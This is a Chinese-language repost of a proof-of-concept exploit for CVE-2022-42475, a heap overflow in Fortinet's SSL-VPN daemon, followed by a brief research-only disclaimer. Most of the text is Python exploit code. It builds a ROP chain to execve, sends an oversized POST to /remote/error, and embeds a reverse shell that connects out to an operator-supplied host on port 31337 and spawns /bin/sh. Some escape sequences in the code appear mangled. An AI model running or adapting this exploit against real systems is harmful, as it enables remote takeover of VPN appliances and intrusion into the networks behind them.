https://github.com/scrt/cve-2022-42475
利用 Fortinet 的 SSLVPN 守护进程中的堆溢出的 POC 代码
import socket
import ssl
from pwn import *
import time
import sys
import requests
context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"
#binary functions
execve = p64(0x0042e050)
#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1
#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000
scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)
ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/pythonx00x00x00x00x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"pythonx00x00"
ropchain += b"-cx00x00x00x00x00x00"
ropchain += b"""import socket,sys,osns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)ns.connect(('"""+ reverse.encode() + b"""',31337))n[os.dup2(s.fileno(),x) for x in range(3)]ni=os.fork()nif i==0:n os.execve('/bin/sh', """+strparams.encode()+b""",{})nx00x00"""
try:
with socket.create_connection((target_host, int(target_port,10))) as sock:
with context.wrap_socket(sock, server_hostname=target_host) as ssock:
ssock.settimeout(2)
context.verify_mode = ssl.CERT_NONE
payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
tosend = b"POST /remote/error HTTP/1.1rnHost: "+target_host +b"rnContent-Length: 115964117980rnrn" + payload
ssock.sendall(tosend)
r = ssock.recv(10024)
except Exception as e:
print("Exception occurred :"+ repr(e))
原文始发于微信公众号(Khan安全攻防实验室):Cve-2022-42475 飞塔
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论